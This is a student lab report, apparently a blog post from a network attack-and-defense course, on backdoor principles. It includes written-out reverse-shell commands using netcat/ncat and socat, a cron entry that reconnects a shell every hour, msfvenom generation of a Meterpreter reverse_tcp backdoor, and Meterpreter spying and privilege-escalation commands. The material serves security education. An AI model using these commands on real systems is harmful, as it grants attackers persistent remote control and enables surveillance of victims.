20155310《网络对抗》Exp2 后门原理与实践

20155310《网络对抗》Exp2 后门原理与实践

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;

浏览网页的时候,点的一些小广告可能会被植入后门。

2.例举你知道的后门如何启动起来(win及linux)的方式?

Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;

对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动;

Linux下可以通过cron来启动。

3.Meterpreter有哪些给你映像深刻的功能?

获取击键记录能得到很多信息,比如登录什么网站的密码,或者说和某人的重要聊天记录之类的,都非常容易被人窃取到进行分析;

导出密码文件功能简直是有点无解,这样一来你的电脑相当于是透明的

4.如何发现自己有系统有没有被安装后门?

没有经过免杀处理的后门程序可能很容易就被杀毒工具扫出来,不过一般现在这样的后门也很少了;

下载专门的监控软件,对操作系统中的进程进行监控,看是否存在异常。

实验过程(基本后门工具实践)

1、Win获取Linux shell

(1)Win在cmd.exe中使用ipconfig命令查看主机的IP。

(2)Win下载老师的下载地址比较方便、解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5310命令运行ncat.exe监听5310端口。

(3)Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的5310端口。

连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell

2、Linux获取Win shell

(1)Linux在终端中使用ifconfig命令查看自己的IP。

(2)Linux使用nc -l -p 5310命令监听5310端口。

(3)Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5310端口。

(4)连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

3、使用nc传输数据

(1)Win使用ncat.exe -l 5310命令监听5310端口。
(2)Linux在终端窗口使用nc Win的IP 端口号命令去连接Win的5310端口。

(3)双向传输数据。

4、nc定时启动

(1)Win使用ncat.exe -l -p 5310命令运行ncat.exe监听5310端口。

(2)Linux使用crontab -e命令,在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh,在每个小时的这个分钟反向连接Windows主机的端口。

(3)3分时Win获得了Linux的shell,可以显示想要获取的东西

5、实践SoCat的功能

(1)在Win下,依次打开控制面板,管理工具,任务计划程序,然后选择创建一个新任务,填写好任务名称(eg20155310);新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

(3)Linux下使用socat - tcp:Win的IP:端口命令,此时已经获取了Win的shell,可以查看想知道的东西。

6、实践MSF Meterpreter功能

(1)Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20155310_backdoor.exe(20155310_backdoor.exe是会生成的后门文件的名字)命令生成后门。

(2)将后门传送到Win主机上(我传送到了ncat文件夹下)。遇到杀毒软件要精确将你自己的后门恢复添加信任区

(3)Linux使用msfconsole命令进入控制台,并进行一系列payload、IP、端口的设置。

(4)在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

(5)Linux使用exploit命令开始监听,此时在Win上执行后门程序。

•拍照功能:webcam_snap

•拍摄视频功能:webcam_stream

•提权:getuid以及getsystem

posted @ 2018-04-04 00:26  20155310  阅读(216)  评论(0编辑  收藏  举报